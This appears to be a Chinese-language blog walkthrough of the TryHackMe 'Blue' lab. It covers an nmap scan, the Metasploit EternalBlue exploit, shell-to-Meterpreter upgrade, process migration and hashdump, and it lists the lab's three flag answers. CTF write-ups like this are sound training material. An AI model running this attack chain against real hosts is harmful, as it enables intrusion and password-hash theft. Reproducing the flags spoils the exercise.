Tryhackme Blue

前提

openvpn连入内网:
下载配置文件,链接内网后启动靶机
file

任务1

主机扫描
command:nmap -sV -vv --script vuln 10.10.78.216
file

file

任务2

msfconsole启动msf
exploit/windows/smb/ms17_010_eternalblue
file
必须设置的,当然是目标ip了RHOST,但是注意,不能直接填rhost,而是要填options里的RHOSTS
file
run/exploit
file
反复尝试,多次重启靶机都失败之后,终于想起来修改LHOST,vpn连入了靶机内网当然要修改LHOST了。
file

任务3

file
题目说要把shell变成meterpreter shell需要用POST模块里的哪一个载荷?
post/multi/manage/shell_to_meterpreter
先ctrl+z退出shell
退出后
sessions -i X :可以再进入会话 (X为session ID)
file
sessions -l :查看当前存在的会话
可以看到shell的类型已经是meterpreter shell了

file
如果不是meterpreter shell的话
执行:

use post/multi/manage/shell_to_meterpreter、
set session X
run

下一题问切换模块修改shell类型时需要修改的option是哪个,那么显然就是session了
确认用户,已经是最高权限了

file

查看进程
file

最后两题意思不是很清楚,猜想可能是,我们执行命令的进程可能不是高权限,需要迁移到以高前线的进程上执行
file

这里如果失败的话,会直接关闭会话,再试一下就好了。
migrate [Pid]

任务4
This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
意思是只要权限对了,就能用'hashdump'拿到存储的密码的hash值
file

hashdump,格式是:【用户名】: 【RID】 : 【LM-HASH 值】 : 【NT-HASH 值】
这里可以看出:除了Administrator(默认管理员)和Guest(默认来宾)以外就只有Jon
file
file
用彩虹表找到了密码
任务5
题目说根目录找flag1
file
flag{access_the_machine}
第二个flag在存储密码的位置,搜了一下路径:
C:\Windows\System32\config
file
flag{sam_database_elevated_access}

file
dir c:\flag3.txt /s /b
flag{admin_documents_can_be_valuable}

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据